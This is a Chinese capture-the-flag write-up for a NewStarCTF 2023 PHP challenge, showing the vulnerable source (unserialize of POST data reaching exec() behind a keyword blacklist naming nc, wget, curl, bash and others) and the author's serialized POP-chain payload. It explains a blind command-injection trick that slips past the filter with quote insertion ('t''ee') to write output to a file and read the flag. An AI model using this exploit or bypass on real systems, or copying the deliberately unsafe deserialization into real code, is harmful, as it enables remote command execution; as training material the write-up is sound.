[NewStarCTF 2023 公开赛道]R!!!C!!!E!!!

这道题是反序列化+无回显RCE

关键点:tee命令

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
 <?php
highlight_file(__FILE__);
class minipop{
public $code;
public $qwejaskdjnlka;
public function __toString()
{
if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
exec($this->code);
}
return "alright";
}
public function __destruct()
{
echo $this->qwejaskdjnlka;
}
}
if(isset($_POST['payload'])){
//wanna try?
unserialize($_POST['payload']);
}

源码如上,一眼就是反序列化,直接构造

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
class minipop{
public $code="ls";
public $qwejaskdjnlka;
public function __toString()
{
if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
exec($this->code);
}
return "alright";
}
public function __destruct()
{
echo $this->qwejaskdjnlka;
}
}
$m=new minipop(); //创建对象
$m->qwejaskdjnlka=new minipop(); //触发__toString()
echo serialize($m); //序列化对象
?>

但是当我交上去的时候发现没有回应

img

一直以为是没有执行成功,后来经过大佬指点才知道是无回显,那么无回显RCE该怎么利用呢,就是把执行结果输出到一个文件里,然后访问这个文件就可以了

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
<?php
class minipop{
public $code="ls /|t''ee 1"; //tee命令输出到 1 文件,用''绕过
public $qwejaskdjnlka;
public function __toString()
{
if(!preg_match('/\\$|\.|\!|\@|\#|\%|\^|\&|\*|\?|\{|\}|\>|\<|nc|tee|wget|exec|bash|sh|netcat|grep|base64|rev|curl|wget|gcc|php|python|pingtouch|mv|mkdir|cp/i', $this->code)){
exec($this->code);
}
return "alright";
}
public function __destruct()
{
echo $this->qwejaskdjnlka;
}
}
$m=new minipop();
$m->qwejaskdjnlka=new minipop();
echo serialize($m);
?>

img

然后执行cat /flag_is_h3eeere|t’’ee 1命令,直接读取flag

img